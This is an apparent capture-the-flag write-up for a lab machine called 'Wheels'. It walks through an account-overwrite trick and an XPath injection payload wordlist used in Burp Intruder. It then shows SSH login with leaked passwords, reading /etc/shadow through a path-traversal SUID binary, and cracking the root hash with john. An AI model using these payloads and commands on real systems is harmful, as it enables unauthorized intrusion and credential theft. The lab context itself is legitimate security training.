Wheels (easy)-- XPATH injection

[WDavid404]

Key points:

• register admin user with email (info@wheels.service) to overwrite the original one --> access some restricted pages.

• XPATH Injection (https://tcm-sec.com/understanding-xpath-injection-a-beginners-guide/)

• XPATH injection burpSuite instruder wordlist:

  ') or 1=1 or (' 
  ') or 1=1] | //user/password[('')=(' 
  ') or 2=1] | //user/node()[('')=(' 
  ')] | //./node()[('')=(' 
  ')] | //node()[('')=(' 
  ') or 1=1] | //user/password[('')=(' 
  ')] | //password%00 
  ')]/../*[3][text()!=(' 
  ')] | //user/*[1] | a[(' 
  ')] | //user/*[2] | a[(' 
  ')] | //user/*[3] | a[(' 
  ')] | //user/*[4] | a[(' 

• stings tool to analyze binary file (e.g. get-list)

[WDavid404]

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Wheels - Car Repair Services

Access to 80 port, register a new user "test" But, we cannot access to /portal.php --> Access Denied

Try to register with "info@wheels.service" --> succeed Access /portal.php so, we have six users name --> SSH brute force ?

XPATH Injection

Try GET /portal.php?work='+order+by+6+--//&action=search --> XPATH injection issue https://book.hacktricks.xyz/v/jp/pentesting-web/xpath-injection

Use Burp Suite intruder based on wordlist from hacktricks

') or 1=1 or (' 
') or 1=1] | //user/password[('')=(' 
') or 2=1] | //user/node()[('')=(' 
')] | //./node()[('')=(' 
')] | //node()[('')=(' 
') or 1=1] | //user/password[('')=(' 
')] | //password%00 
')]/../*[3][text()!=(' 
')] | //user/*[1] | a[(' 
')] | //user/*[2] | a[(' 
')] | //user/*[3] | a[(' 
')] | //user/*[4] | a[(' 

--> ')] | //password%00 --->

Iamrockinginmyroom1212
iamarabbitholeand7875
johnloveseverontr8932
lokieismyfav!@#12
alreadydead$%^234
lasagama90809!@

Try ssh with user list and password list --> bob:Iamrockinginmyroom1212 work!

PE

find / -perm -u=s -type f 2>/dev/null --> /opt/get-list --> Download it to Kali and analyze it

strings get-list (To install strings: sudo apt-get install binutils) -->

so we can let it read /etc/shadow as "../../etc/shadow" --> root:$6$Hk74of.if9klVVcS$EwLAljc7.DOnqZqVOTC0dTa0bRd2ZzyapjBnEN8tgDGrR9ceWViHVtu6gSR.L/WTG398zZCqQiX7DP/1db3MF0:19123:0:99999:7:::

unshadow passwd.txt shadow.txt > unshadowed.txt  
john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

--> highschoolmusical (root)

su root with the password above --> work!